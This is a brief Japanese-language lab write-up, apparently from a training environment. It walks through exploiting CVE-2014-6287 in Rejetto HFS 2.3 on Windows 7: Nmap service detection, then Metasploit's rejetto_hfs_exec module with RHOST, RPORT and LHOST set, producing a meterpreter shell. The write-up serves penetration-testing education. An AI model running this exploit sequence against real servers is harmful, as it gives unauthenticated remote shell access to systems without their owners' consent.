
HFS 2.3 上の Metasploit RCE - CVE-2014-62
HFS 2.3 に対する Metasploit RCE - CVE-2014-62
🔖 プロジェクトのタイトル
> HTTP File Server (HFS 2.3) を介したリモートコード実行
⚙ 使用ツール • Kali Linux • Nmap • Metasploit • ターゲット: Windows 7 上の HFS 2.3
🔐 脆弱性の詳細 • 名前: CVE-2014-6287 • 種類: リモートコード実行 • 原因: HFS スクリプティングにおける未検証の入力 • 影響: 未認証のシェルアクセス
🔍 手法 (ステップバイステップ)
🔹 ステップ 1: 情報収集 (Nmap)
• nmap -sV demo.ine.local (ターゲットのIP)
• 発見されたオープンポート: 80
• サービス: rejetto HTTP ファイルサーバー 2.3

🔹 ステップ 2: エクスプロイト (Metasploit)
• Msfconsole
• HFS または rejetto を検索
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
Exploit
🔹 ステップ 3: ポストエクスプロイト
実行後、meterpreter セッションが取得できます shell コマンドを使用します
• whoami • ipconfig • dir

**